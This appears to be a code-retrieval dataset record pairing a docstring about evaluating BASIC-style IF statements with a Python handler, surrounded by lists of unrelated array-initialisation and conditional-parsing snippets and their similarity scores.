= array.datashape.copy()\n ds.dim_low = [0] * ds.ndim\n return array.redimension(ds.schema)", "def setup(self, length):\n self.matrix = [None] * length\n for x in range(0,length):\n self.matrix[x] = [None] * length\n self.i = self.k = self.j = 0", "def _alloc(self, dim):\n maxp = self.maxp\n self.dim = dim\n self.x = np.zeros((maxp, dim))\n self.fx = np.zeros((maxp, 1))\n self.surrogate_list = [\n [None for _ in range(maxp)] for _ in range(self.M)]", "def zeros(cls, shape, domain, *, fmt='sparse'):\n return cls.from_rep(SDM.zeros(shape, domain))", "def __init__(self, shape, dtype = 'd'):\n self.shape = shape\n self.dtype = dtype\n \n ncell = int(np.prod(self.shape))\n self.shared_array_base = Array(dtype, ncell,lock=False) \n pass", "def __init__(self, rows, cols):\n if rows <= 0:\n raise ValueError('Number of matrix rows must be greater than zero.')\n if cols <= 0:\n raise ValueError('Number of matrix cols must be greater than zero.')\n\n self.__rows = rows\n self.__cols = cols\n\n # Create the matrix and initialize all elements to zero\n self.__m = []\n for i in range(1, self.__rows + 1):\n row = []\n for j in range(1, self.__cols + 1):\n row.append(0)\n self.__m.append(row)", "def _init_empty(self):\n self._data = []", "def matZeros(shape):\n return [[0 for y in range(shape[1])] \\\n for x in range(shape[0])]", "def __init__(self, growth_factor=2):\n self._length = 0 # Number of elements in array\n self._capacity = 1 # Capacity of array before expanding\n self._arr = self._create_array(self._capacity) # Compact array of pointers\n self._growth_factor = max(2, growth_factor) # Factor to grow array when capacity reached", "def Array(cls, size=None):\n array_class = NandArray\n if size:\n return array_class(size)\n return array_class", "def __init__(self):\n self.arr = []\n self.size = 0", "def zeroes(height, width):\n g = [[0.0 for _ in range(width)] for __ in range(height)]\n return Matrix(g)", "def __init__(self, x_size: int, y_size: int, dtype=np.int8):\r\n self.fb = np.zeros(shape=(x_size, y_size), dtype=dtype)\r\n self.x_size = x_size\r\n self.y_size = y_size\r\n self.dtype = dtype", "def zeros(dims,shape_c,shape_l,connections):\n return MultiterminalDevice(\n TightBinding.zeros(dims,shape_c),\n tuple(TightBinding.zeros(dims+1,i) for i in shape_l),\n connections,\n )", "def __init__(self, arr=None):\n self.data = arr.copy() if arr else []", "def __init__(self, shape):\n self.A = np.zeros(shape) # create space for the resultant activations", "def zerovec(self, X):\n return np.zeros(X.size())", "def zeros(\n shape,\n *,\n dtype=None,\n order=\"C\",\n device=None,\n usm_type=\"device\",\n sycl_queue=None,\n):\n dpu.validate_usm_type(usm_type, allow_none=False)\n sycl_queue_normalized = dpnp.get_normalized_queue_device(\n sycl_queue=sycl_queue, device=device\n )\n if order is None:\n order = \"C\"\n\n \"\"\"Creates `dpnp_array` of zeros with the given shape, dtype, and order.\"\"\"\n array_obj = dpt.zeros(\n shape,\n dtype=dtype,\n order=order,\n usm_type=usm_type,\n sycl_queue=sycl_queue_normalized,\n )\n return dpnp_array(array_obj.shape, buffer=array_obj, order=order)", "def _create_array(self, array_name, ndim=1, dtype=None, zeros=True, derived=False, shared=None):\n\n # Does this actually correspond to a slice into a 3D array?\n NDname = self._array_name_1D_to_ND(array_name)\n if NDname:\n self._create_array(\n NDname, ndim=3, dtype=dtype, zeros=zeros, derived=derived)\n return\n\n if ndim == 1:\n dims = self._num_particles\n else:\n dims = (self._num_particles, ndim)\n\n if shared 
is None:\n shared = self._shared_arrays\n\n new_array = array._array_factory(dims, dtype, zeros, shared)\n new_array._sim = weakref.ref(self)\n new_array._name = array_name\n new_array.family = None\n # new_array.set_default_units(quiet=True)\n self._arrays[array_name] = new_array\n\n if derived:\n if array_name not in self._derived_array_names:\n self._derived_array_names.append(array_name)\n\n if ndim == 3:\n array_name_1D = self._array_name_ND_to_1D(array_name)\n\n for i, a in enumerate(array_name_1D):\n self._arrays[a] = new_array[:, i]\n self._arrays[a]._name = a", "def __init__(self, initArray):\n for row in initArray:\n for elem in row:\n if type(elem) is not int:\n raise TypeError\n\n n = len(initArray[0])\n if not all(len(x) == n for x in initArray):\n raise ArithmeticError\n\n self.array = initArray\n return", "def xinit(self, xshape):\n\n return np.zeros(xshape, dtype=self.dtype)", "def _train(self):\n return np.zeros(1, 10)", "def test_30_test_init_array(self, persons_gi):\n example = Example(groups=7, origins=5)\n\n example.init_array('param_g', 7)\n assert example.param_g.shape == (7, )", "def array (self, length, width):\n\t\treturn [[0 for i in range(width)] for j in range(length)] #List comprehensions (Works like two for loops)", "def init_matrix(x_dim = 10, y_dim = 10):\n ret = np.zeros((x_dim, y_dim))\n x_rand = np.random.randint(0, x_dim - 1)\n y_rand = np.random.randint(0, y_dim - 1)\n ret[x_rand, y_rand] = 1\n\n return(ret)", "def zeros_como(self):\n\n return self.zeros(*self.dim())", "def __init__(self, size=1):\n self._data = self._make_array(size)\n self._size = 0\n self._capacity = size", "def init_array(self,\n position,\n data_shape,\n chunk_size,\n chan_names,\n dtype='float32',\n clims=None,\n position_name=None,\n overwrite=False):\n pos_name = position_name if position_name else f'Pos_{position:03d}'\n\n # Make sure data matches OME zarr structure\n if len(data_shape) != 5:\n raise ValueError('Data shape must be (T, C, Z, Y, X), not {}'.format(data_shape))\n\n self.sub_writer.create_position(position, pos_name)\n self.sub_writer.init_array(data_shape, chunk_size, dtype, chan_names, clims, overwrite)", "def __init__(self):\n self.size = 1000\n self.mapArray = [None] * self.size", "def zeros(shape, dtype=float):\n if not mathutil.is_shape(shape, ndim=2):\n raise ValueError(\"invalid shape\")\n\n sc = SparkContext.getOrCreate()\n\n nelem = 0\n\n rdd = sc.emptyRDD()\n\n return Matrix(rdd, shape, dtype=dtype, nelem=nelem)", "def zeros_like(a, dtype=None, order='K', subok=True, shape=None):\n\n res = np.full(a.shape, 0, dtype=a.dtype)\n return res", "def setUp(self):\n self.gray_image = np.ndarray((100, 200), dtype=np.uint8)\n self.rgb_image = np.ndarray((100, 200, 3), dtype=np.uint8)", "def createarray(m,n):\n return( np.ones((m,2,n)) )", "def _init_array(self, b, c):\n self._.c = (Integer(0), ) + tuple(c)\n self._.b = tuple(b) + (Integer(0), )", "def __init__(self, memset_0=False):\r\n self.memset_0 = memset_0" ]
[ "0.66444355", "0.66228235", "0.65934485", "0.65253294", "0.63993794", "0.63414425", "0.6330485", "0.63030803", "0.6281445", "0.62749404", "0.6273253", "0.62706274", "0.62627155", "0.62333333", "0.6128069", "0.6122897", "0.60999733", "0.60854125", "0.6048962", "0.6042979", "0.6029864", "0.60283387", "0.6022593", "0.6022314", "0.5999331", "0.59949255", "0.5990542", "0.59866744", "0.59824985", "0.59681135", "0.593726", "0.5907308", "0.5906225", "0.5874376", "0.58686095", "0.586001", "0.5846968", "0.58405715", "0.5834719", "0.580923", "0.58089787", "0.5805307", "0.5801925", "0.5794497", "0.576048", "0.57594", "0.5740647", "0.57194746", "0.57090056", "0.570548", "0.570369", "0.5695329", "0.5693289", "0.56846756", "0.5683871", "0.5680604", "0.56586885", "0.56541145", "0.5641918", "0.56397796", "0.5630665", "0.56106335", "0.5609139", "0.56089914", "0.5605903", "0.5589943", "0.5585157", "0.5577748", "0.55719566", "0.5569546", "0.5566527", "0.55553657", "0.55490685", "0.5527029", "0.5513994", "0.55120236", "0.5506687", "0.55066097", "0.5505701", "0.55043364", "0.55011165", "0.54949814", "0.5492656", "0.54760826", "0.5468116", "0.546093", "0.5447379", "0.5431375", "0.54236037", "0.5423388", "0.54228437", "0.5420452", "0.54185367", "0.5417839", "0.5416571", "0.54142493", "0.5413155", "0.5406514", "0.54057556", "0.5399701", "0.53867984" ]
0.0
-1
An if statement works by skipping to the next line if the THEN clause is false; otherwise it continues to execute the clauses after the THEN.
def stmt_if(executor, stmt):
    # Evaluate the condition; on false, skip the remaining clauses on this line.
    e = Expression()
    result = e.eval(stmt._tokens, symbols=executor._symbols)
    if not result:
        executor.goto_next_line()
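The handler above only makes sense next to a dispatch loop that runs the clauses of one line in order and honors goto_next_line. A hypothetical sketch of such a loop; run_line, HANDLERS, stmt.keyword, and executor.location are all assumptions, not names taken from this dataset:

HANDLERS = {"IF": stmt_if, "DIM": stmt_dim}  # assumed keyword-to-handler registry

def run_line(executor, parsed_statements):
    # Run each clause on the current line in order; stop dispatching if a
    # handler jumped away, e.g. stmt_if calling goto_next_line() on false.
    start = executor.location  # assumed: index of the line being executed
    for stmt in parsed_statements:
        HANDLERS[stmt.keyword](executor, stmt)
        if executor.location != start:
            return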
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def end_ifeq(self):\n self.indent_left()\n self.write_line(\"endif\")", "def test_28_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then return; else return 0; end\n\t\tend\"\"\"\n\t\texpect = \"Type Mismatch In Statement: Return(None)\"\n\t\tself.assertTrue(TestChecker.test(input,expect,428))", "def test_27_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then a:=0; else b:=0; end\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,427))", "def conditional(self) -> global___Statement.Conditional:", "def test_30_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then a:=1; else return 0; end\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,430))", "def test_29_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then return 1; else b:=0; end\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,429))", "def postparsing_precmd(self, statement):\n stop = False\n return stop, statement", "def postparsing_precmd(self, statement):\n stop = False\n return stop, statement", "def _If(self, t):\n self.fill(\"if (\")\n self.dispatch(t.test)\n self.write(\")\")\n self.enter()\n self.dispatch(t.body)\n self.leave()\n # collapse nested ifs into equivalent elifs.\n while (t.orelse and len(t.orelse) == 1 and\n isinstance(t.orelse[0], ast.If)):\n t = t.orelse[0]\n self.fill(\"else if (\")\n self.dispatch(t.test)\n self.write(\")\")\n self.enter()\n self.dispatch(t.body)\n self.leave()\n # final else\n if t.orelse:\n self.fill(\"else\")\n self.enter()\n self.dispatch(t.orelse)\n self.leave()", "def test_31_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\tif a>0 then return 0;\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,431))", "def compile_if(self):\r\n else_label = \"ELSE_\" + str(self.__if_count)\r\n end_label = \"END_IF_\" + str(self.__if_count)\r\n self.__if_count += 1\r\n self.__advance(n=2)\r\n self.compile_expression()\r\n self.__vmwriter.write_arithmetic(\"not\")\r\n self.__vmwriter.write_if(else_label)\r\n self.__advance(n=2)\r\n self.compile_statements()\r\n self.__vmwriter.write_goto(end_label)\r\n self.__vmwriter.write_label(else_label)\r\n self.__advance()\r\n if self.__tokenizer.keyword() == TYPES_DIC[\"ELSE\"]:\r\n self.__advance(n=2)\r\n self.compile_statements()\r\n self.__advance()\r\n self.__vmwriter.write_label(end_label)", "def test_78_continue(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then continue;\n\t\t\twith x:integer; do if (x=0) then return;\n\t\tend{with} continue; end{while} continue; end\"\"\"\n\t\texpect = \"Continue Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,478))", "def eliminate_ifones(body):\n def isifone(tree):\n if type(tree) is If:\n if 
type(tree.test) is Num: # TODO: Python 3.8+: ast.Constant, no ast.Num\n if tree.test.n == 1:\n return \"then\"\n elif tree.test.n == 0:\n return \"else\"\n elif type(tree.test) is NameConstant: # TODO: Python 3.8+: ast.Constant, no ast.NameConstant\n if tree.test.value is True:\n return \"then\"\n elif tree.test.value in (False, None):\n return \"else\"\n return False\n\n def optimize(tree): # stmt -> list of stmts\n t = isifone(tree)\n if t:\n branch = tree.body if t == \"then\" else tree.orelse\n return branch\n return [tree]\n\n return transform_statements(optimize, body)", "def visit_if(self: Parser, node: doc.If) -> None:\n with self.var_table.with_frame():\n with T.If(self.eval_expr(node.test)):\n with T.Then():\n with self.var_table.with_frame():\n self.visit_body(node.body)\n if node.orelse:\n with T.Else():\n with self.var_table.with_frame():\n self.visit_body(node.orelse)", "def test_77_continue(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then continue;\n\t\t\twith x:integer; do if (x=0) then continue; else return;\n\t\tend{with} end{while} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,477))", "def test_if_elseif_and_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif awesome.sauce[1] and blue and 'hello'}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif awesome.sauce[1] and blue and 'hello' %}\\nfoo{% endif %}\"", "def dummy_elif(dummy_code_block):\n return make_dummy_elif()", "def test_76_continue(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then continue;\n\t\t\twith x:integer; do continue;\n\t\tend{with} end{with} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,476))", "def get_if_condition(self, file, i):\n\n # Check if 'if function' is to run main function of program\n if re.match(\"if __name__ == [\\\"']__main__[\\\"']:\", file[i]) and \\\n re.match(r\"\\s*main\\(\\)\", file[i + 1]):\n\n # If yes, return None\n return \"omit\", 2, \n\n # Run super definition\n line = super().get_if_condition(file, i)\n\n # Strip ending colon\n line = line.split(\":\", 1)\n line, multi_statement = line[0], line[1]\n\n # Set if keyword for back translation\n ln_split = line.split(\" \")\n if ln_split[0] not in [\"elif\", \"else\"]:\n if_kw = \"if\"\n else:\n if_kw, line = ln_split[0], \" \".join(ln_split[1:]).strip()\n\n # Replace 'elif' with standard\n if if_kw == \"elif\":\n if_kw = \"else if\"\n\n # Replace logical operators\n line = self.replace_logical_ops(line, direction=\"to\")\n\n # Create start and end for while call\n start = []\n end = []\n\n # Check if multiple statements are declared in one line\n if multi_statement.strip():\n start += multi_statement.split(\";\")\n\n # Return if condition\n return line, if_kw, start, end", "def test_if_elseif_paren_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif (foo and bar) or foo and (bar or (foo and bar))}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif (foo and bar) or foo and (bar or (foo and bar)) %}\\nfoo{% endif %}\"", "def compile_if(self):\r\n lab1 = self.class_name + \".L\" + str(self.label_index)\r\n self.label_index += 1\r\n lab2 = self.class_name + \".L\" + str(self.label_index)\r\n self.label_index += 1\r\n self.tokenizer.advance() # ignore 
'if' keyword\r\n self.tokenizer.advance() # ignore '(' symbol\r\n self.compile_expression()\r\n self.code_writer.write_arithmetic(\"not\")\r\n self.tokenizer.advance() # ignore ')' symbol\r\n self.tokenizer.advance() # ignore '{'\r\n self.code_writer.write_if(lab1)\r\n self.compile_statements()\r\n self.code_writer.write_goto(lab2)\r\n self.tokenizer.advance() # ignore '}' symbol\r\n self.code_writer.write_label(lab1)\r\n if (self.tokenizer.token_type() == JackTokenizer.KEYWORD_T and\r\n self.tokenizer.key_word() == \"else\"):\r\n self.tokenizer.advance()\r\n self.tokenizer.advance() # ignore '{' symbol\r\n self.compile_statements()\r\n self.tokenizer.advance() # ignore '}' symbol\r\n self.code_writer.write_label(lab2)", "def compile_else(self):\n\n\t\txml = self.tokenizer.keyword() + self.tokenizer.symbol() + '<statements>\\n'\n\t\tself.outfile.write(xml)\n\n\t\twhile self.tokenizer.get_token() != '}':\n\t\t\tself.compile_statements()\n\n\t\txml = '</statements>\\n' + self.tokenizer.symbol()\n\t\tself.outfile.write(xml)", "def with_if_statement():\n if c():\n return t()\n else:\n return f()", "def parseIfStatement( ): # parse rountine for the if and uses the if class to print out the appropriate string\n\n\ttok = tokens.peek( )\n\tif debug: print( \"ifStatement: \", tok )\n\tstart = match( \"if\" )\n\texpr = expression( )\n\tblk = parseBlock( )\n\telseblk = None\n\ttok = tokens.peek( )\n\tif tok == \"else\":\n\t\tmatch( \"else\" )\n\t\telseblk = parseBlock( )\n\treturn ifStatement(expr, blk, elseblk)", "def test_if_elseif_else_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif blue}\\nfoo\\n{else}bar{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif blue %}\\nfoo\\n{% else %}bar{% endif %}\"", "def link_if_stmt(self, stmt):\n self.link_expr(stmt.cond)\n self.link_stmt(stmt.true_body)\n if stmt.false_body is not None:\n self.link_stmt(stmt.false_body)", "def _IfExp(self, t):\n self.dispatch(t.test)\n self.write(\" ? 
\")\n self.dispatch(t.body)\n self.write(\" : \")\n self.dispatch(t.orelse)", "def test_if_statement_multiple():\n r = convert_code(\n \"{if !foo or foo.bar or foo|bar:foo['hello']}\\nfoo\\n{/if}\")\n assert r == \"{% if not foo or foo.bar or foo|bar(foo['hello']) %}\\nfoo\\n{% endif %}\"", "def _check_semicolon_else_skip(self, symbol):\n if symbol.type == self.scanner.SEMICOLON:\n pass\n else:\n self._display_syntax_error(\"semicolon\")\n # Skip to semicolon at end of line\n self._semicolon_skipper()", "def start_ifeq(self, left, right):\n self.write_line(\"ifeq (\" + left + \",\" + right + \")\")\n self.indent_right()", "def test_if_elseif_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif blue}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif blue %}\\nfoo{% endif %}\"", "def test_32_if(self):\n\t\tinput = \"\"\"function foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a=0 then return 1; else return a; end\n\t\tend\n\t\tprocedure main(); var x:integer; begin x:=foo(); foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,432))", "def multi_statement() -> None:\n pass; print(\"hello\")", "def _check_multiline_conditions(self, node: ast.If) -> None:\n start_lineno = getattr(node, 'lineno', None)\n for sub_nodes in ast.walk(node.test):\n sub_lineno = getattr(sub_nodes, 'lineno', None)\n if sub_lineno is not None and sub_lineno > start_lineno:\n self.add_violation(MultilineConditionsViolation(node))\n break", "def _process_if(self, node):\n creg = node.children[0].name\n cval = node.children[1].value\n self.backend.set_condition(creg, cval)\n self._process_node(node.children[2])\n self.backend.drop_condition()", "def elifs_to_if_then_else(stm):\n if stm.elifs:\n # replace elifs with nested if statements\n ifFalse = HdlStmBlock()\n topIf = HdlStmIf(stm.cond, stm.if_true, ifFalse)\n\n for c, stms in stm.elifs:\n _ifFalse = HdlStmBlock()\n\n lastIf = HdlStmIf(c, stms, _ifFalse)\n\n ifFalse.append(lastIf)\n ifFalse = _ifFalse\n\n if stm.if_false is None:\n lastIf.if_false = HdlStmBlock()\n else:\n lastIf.if_false = stm.if_false\n\n return topIf\n return stm", "def cond2if(cond_exp):\n def expand_clauses(list_of_clauses): \n if isNull(list_of_clauses):\n return FALSE # 4-15\n first = first_clause(list_of_clauses)\n rest = rest_clauses(list_of_clauses)\n if isElseClause(first):\n if isNull(rest):\n return seq2exp(cond_actions(first)) \n else:\n raise ValueError(\"ELSE clause is not last -- cond2if\")\n else:\n return make_if(\n cond_predicate(first),\n seq2exp(cond_actions(first)), # make a single \"'begin\" expression\n expand_clauses(rest))\n return expand_clauses(cond_clauses(cond_exp)) # 4-15 changed exp to cond_exp", "def should_execute(self, context: dict) -> bool:\n\n print(f'Checking snippet: {self.name}')\n\n if 'when' not in self.metadata:\n # always execute when no when conditional is present\n print(f'No conditional present, proceeding with skillet: {self.name}')\n return True\n\n when = self.metadata['when']\n when_str = '{{%- if {0} -%}} True {{%- else -%}} False {{%- endif -%}}'.format(when)\n when_template = self._env.from_string(when_str)\n results = when_template.render(context)\n print(f' Conditional Evaluation results: {results} ')\n if str(results).strip() == 'True':\n return True\n else:\n return False", "def __EvaluateIf(self, countIf, line):\n countIf = countIf - 1\n i = self.__ifs[countIf]\n i.SetLinePointer(self.__linePointer)\n #s = 
self.ScanIfCond(self.__oc.GermanUmlautReplace(line))\n s = self.ScanIfCond(line)\n if s:\n i.Set(s[0])\n try:\n i.Eval()\n line = ''\n except:\n raise Core.Error.IfHasNoEndif(0, 'IF-EXPRESSION %i HAS HAD AN ERROR:' \\\n ' EITHER NO CORRESPONDING (endif) OR SYNTAX ERROR'\n % countIf)\n l1, l2 = i.GetNextLine(), line\n return l1, l2", "def visit_if(self, node):\n branches = 1\n # don't double count If nodes coming from some 'elif'\n if node.orelse and len(node.orelse) > 1:\n branches += 1\n self.inc_branch(branches)\n self.stmts += branches", "def special_if(self, form):\n testforms = [form[1:]]\n elseform = None\n\n startIndex = None\n\n parent = form.up()\n\n for i in range(len(parent)):\n x = parent[i]\n if x is form:\n startIndex = i\n\n if startIndex is None:\n raise RuntimeError(\"Bad\")\n\n # find following forms that begin with `elif' and `else'. We\n # break on anything else. Accumulate number of forms to delete.\n index = startIndex + 1\n\n while index < len(parent):\n f = parent[index]\n if isinstance(f, Form) and len(f) and isinstance(f[0], Identifier):\n if f[0].name == 'elif':\n testforms.append(f[1:])\n f.insert(0, Ignore)\n elif f[0].name == 'else':\n elseform = f[1:]\n f.insert(0, Ignore)\n # there should be nothing after else\n break \n else:\n # Anything other than elif or else, break\n break \n else:\n # it doesn't look anything at all like an else or an elif form\n break \n index += 1\n\n tests = [(self.reallyCompile(t[0]), self.compileSuite(t[1:])) for t in testforms]\n else_ = elseform and self.compileSuite(elseform)\n\n r = ast.If(tests, else_)\n return r", "def _apply_if_statement(statement: ast.If) -> None:\n for child in ast.iter_child_nodes(statement):\n if isinstance(child, ast.If):\n if child in statement.orelse:\n setattr(statement, 'wps_if_chained', True) # noqa: B010\n setattr(child, 'wps_if_chain', statement) # noqa: B010", "def stop_when_true(test_expr, result_expr, seq):\n result = None\n for e in seq:\n if test_expr(e):\n result = result_expr(e)\n break\n return result", "def cond(\n scheduler: Scheduler,\n parent_job: Job,\n sexpr: SchedulerExpression,\n cond_expr: Any,\n then_expr: Any,\n *rest: Any,\n) -> Promise:\n exprs = (cond_expr, then_expr) + rest\n\n def then(args):\n i, cond_value = args\n\n if cond_value:\n # Return 'then' clause.\n return scheduler.evaluate(exprs[i + 1], parent_job=parent_job)\n\n elif len(exprs) - i == 3:\n # No more expresses, so return 'otherwise' clause.\n return scheduler.evaluate(exprs[i + 2], parent_job=parent_job)\n\n else:\n # Recurse to next conditional clause.\n return scheduler.evaluate((i + 2, exprs[i + 2]), parent_job=parent_job).then(then)\n\n # Evaluate conditional clause.\n return scheduler.evaluate((0, cond_expr), parent_job=parent_job).then(then)", "def item5():\n for i in range(3):\n print('Loop %d' % i)\n else:\n print('Else block!')\n\n for i in range(3):\n print('Loop2 %d' % i)\n if i == 1:\n break\n else:\n print('Else2 block!')\n\n for x in []:\n print('Never runs')\n else:\n print('Else3 block!')\n\n while False:\n print('Never runs')\n else:\n print('Else4 block!')", "def compile_if(self) -> None:\n self._consume('if')\n self._consume('(')\n self.compile_expression()\n self._consume(')')\n\n end_lbl = f'IF_END_{self._if_count}'\n false_lbl = f'IF_FALSE_{self._if_count}'\n self._if_count += 1\n\n self._consume('{')\n self.writer.write_if(false_lbl)\n\n self.compile_statements()\n self.writer.write_goto(end_lbl)\n self.writer.write_label(false_lbl)\n\n self._consume('}')\n\n if 
self._get_current_token() == 'else':\n self._consume('else')\n self._consume('{')\n self.compile_statements()\n self._consume('}')\n\n self.writer.write_label(end_lbl)", "def Require(condition):\n if not condition:\n Revert()\n return True", "def irgen_continue(stmt, builder, table):\n tmp = builder.unreachable() \n if stmt.label:\n table.conts[tmp] = (builder.block, table[stmt.label])\n else:\n table.conts[tmp] = (builder.block, None)", "def test_if_paren_statement():\n r = convert_code(\n \"{if (foo and bar) or foo and (bar or (foo and bar))}\\nbar\\n{else}\\nfoo{/if}\")\n assert r == \"{% if (foo and bar) or foo and (bar or (foo and bar)) %}\\nbar\\n{% else %}\\nfoo{% endif %}\"", "def _ifelse(self):\n debug.show(\"ifelse:Stack = \" + str(self.opStack))\n if self.opStack.size() >= 3:\n falseCode = check.isCode(self.opStack.pop()) # Make sure it is code (a list)\n trueCode = check.isCode(self.opStack.pop()) # Make sure it is code (a list)\n if check.isBool(self.opStack.pop()):\n debug.show(\"ifelse:True\")\n self.evaluate(trueCode)\n else:\n debug.show(\"ifelse:False\")\n self.evaluate(falseCode)\n else:\n debug.err(\"not enough items on the stack\")\n return None", "def test_73_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do if (x=0) then break; else return;\n\t\tend{with} end{while} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,473))", "def check_continue(config: SimpleNamespace, prev: str=None, next: str=None) -> None:\n if config.general.debug_mode:\n if prev and next:\n print(f'\\n{prev.upper()} phase completed. Next up: {next.upper()} phase.')\n x = input('\\nDo you want to continue y/n? ')\n if x not in ['yes', 'y', '']:\n print()\n sys.exit(0)", "def perform(self):\n if self.format_and_eval_string(self.condition):\n raise ContinueException()", "def parse_if_cmd(self, line):\n line = re.sub(\"^if *\", \"\", line)\n\n # remove the brackets\n statement, _ = gen_parse.get_str_between_delims(line, \"(\", \")\")\n\n # Check all variables have been declared\n any_vars = [i for i in re.findall(IN_STR_VAR_REGEX, statement)]\n # Get the variables declared\n _vars = []\n for var in any_vars:\n _Var = getattr(self, var.strip('$'))\n if type(_Var) == inp_types.Variable: _vars.append(_Var.data)\n else: _vars.append(_Var)\n\n for var_name, var_val in zip(any_vars, _vars):\n statement = statement.replace(var_name, str(var_val))\n\n # Evaluate the if statement\n try:\n var_container = {}\n exec(f\"val = {statement}\", var_container)\n val = var_container['val']\n except Exception as e:\n self.print_error(\"Couldn't parse the if statement\\n\\nError:\"\n + str(e))\n\n end_line = self.get_end_brace()\n\n self.line_num += 1\n if val is False:\n self.line_num = end_line", "def check_if_statement(self, line):\n line = re.sub(\"^if *\", \"\", line)\n if '(' not in line or ')' not in line:\n self.print_error(\"Syntax error: If statements take the syntax if (condition) { ... 
}\",\n errorFunc=SyntaxError)\n\n\n # remove the brackets\n statement, _ = gen_parse.get_str_between_delims(line, \"(\", \")\")\n\n\n # Check all variables have been declared\n any_vars = [i.strip('$') for i in re.findall(VAR_REGEX, statement)]\n for var_name in any_vars:\n if var_name not in self.variables:\n self.print_error(f\"Unknown variable: {var_name}\")", "def _analyse_stmt_Continue(\n self, statement: ast.Continue, *, next: CFNode\n ) -> CFNode:\n return self._ast_node(statement, next=self._context[_CONTINUE])", "def verify_skip(self, d_stmt, table): \n pass", "def IfStatement(self):\n self.currtok = next(self.tg)\n if self.currtok[1].name == \"LPAREN\":\n self.currtok = next(self.tg)\n express = self.Expression()\n if self.currtok[1].name == \"RPAREN\":\n self.currtok = next(self.tg)\n state = self.Statement()\n if self.currtok[1].name == \"else\":\n self.currtok = next(self.tg)\n state2 = self.Statement()\n return ifelseStmt(express, state, state2)\n else:\n return ifStmt(express, state)\n raise SLUCSyntaxError(\"ERROR: Missing right paren on line {0}\".format(str(self.currtok[2] - 1)))\n raise SLUCSyntaxError(\"ERROR: Missing left paren on line {0}\".format(str(self.currtok[2] - 1)))", "def statement( ): # parse rountin for statement that makes sure the token is one of the following, eventually there will be an error caught\n\n\ttok = tokens.peek( )\n\tif debug: print( \"statement: \", tok )\n\tif tok == \"if\":\n\t\tstat = parseIfStatement( )\n\t\treturn stat\n\telif tok == \"while\":\n\t\tstat = parseWhileStatement( )\n\t\treturn stat\n\telse: \n\t\tstat = parseAssign( )\n\t\treturn stat", "def statements(self):\n\n while self.token.value not in ('EOF', 'else', 'end'):\n\n with self.resync('\\n', consume=True):\n self.statement()\n\n if not self.match(Tokens.SYMBOL, \";\"):\n self.error(\"expected ';' after statement \", token=self.prev_token, after_token=True)\n\n # consume the 'end' token if there is one\n self.match(Tokens.KEYWORD, 'end')", "def test_if_else_statement():\n r = convert_code(\"{if foo}\\nbar\\n{else}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% else %}\\nfoo{% endif %}\"", "def switch(cond, ift, iff):", "def test_34_break(self):\n\t\tinput = \"\"\"function foo():integer; var a:real; begin\n\t\twhile a > 0 do\n\t\twith a:integer;b:boolean; do begin b:=true; break; end\n\t\treturn 1;\n\t\tend\n\t\tprocedure main(); var x:integer; begin x:=foo(); foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,434))", "def ifelse(test, if_true, if_false):\n if test:\n return if_true\n else:\n return if_false", "def _if(self):\n debug.show(\"if:Stack = \" + str(self.opStack))\n if self.opStack.size() >= 2:\n ifcode = isCode(self.opStack.pop()) # Make sure it is code (a list)\n if check.isBool(self.opStack.pop()):\n debug.show(\"if:True\")\n evaluate(ifcode)\n else:\n debug.err(\"not enough items on the stack\")\n 